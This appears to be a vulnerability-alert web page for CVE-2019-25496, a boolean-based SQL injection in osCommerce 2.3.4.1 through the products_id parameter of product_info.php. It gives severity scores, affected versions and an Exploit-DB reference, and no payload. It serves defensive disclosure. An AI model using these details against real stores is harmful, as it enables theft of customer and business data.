Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.8
osCommerce 2.3.4.1: Attackers can steal sensitive database info
CVE-2019-25496
Summary
An attacker can exploit a weakness in osCommerce to access sensitive database information without needing a password. This affects anyone using osCommerce 2.3.4.1, and it's essential to update to a fixed version to prevent data theft. Immediate action is recommended to protect your business.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| oscommerce | oscommerce | 2.3.4.1 | – |
Original title
osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the products_id parameter. Attackers can...
Original description
osCommerce 2.3.4.1 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the products_id parameter. Attackers can modify the products_id value in product_info.php requests and append boolean-based SQL injection payloads to extract sensitive database information.
nvd CVSS3.1
7.5
nvd CVSS4.0
8.8
Vulnerability type
CWE-89
SQL Injection
- https://www.exploit-db.com/exploits/46329 Exploit VDB Entry
- https://www.oscommerce.com Product
- https://www.vulncheck.com/advisories/oscommerce-sql-injection-via-productsid-par... Broken Link
Published: 27 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026